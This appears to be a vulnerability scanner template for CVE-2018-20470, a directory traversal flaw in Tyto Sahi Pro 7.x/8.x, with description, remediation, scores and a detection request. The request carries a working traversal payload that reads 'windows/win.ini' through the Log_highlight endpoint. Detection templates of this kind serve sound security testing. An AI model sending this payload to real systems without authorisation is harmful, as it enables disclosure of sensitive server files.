id: CVE-2018-20470 info: name: Tyto Sahi pro 7.x/8.x - Local File Inclusion author: daffainfo severity: high description: | Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Tyto Sahi pro. reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-20470 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 epss-score: 0.60641 epss-percentile: 0.97502 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sahipro product: sahi_pro tags: cve2018,cve,lfi,packetstorm,sahipro http: - method: GET path: - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" matchers-condition: and matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and - type: status status: - 200 # digest: 4a0a004730450220416555074a2363c09646f56423f9c459c447e730675f68f1c7a1139e2349e881022100d3472326257aa27dec50b113e6f576559301190c17b3ea7436347e20c6f83fa5:922c64590222798bb761d5b6d8e72950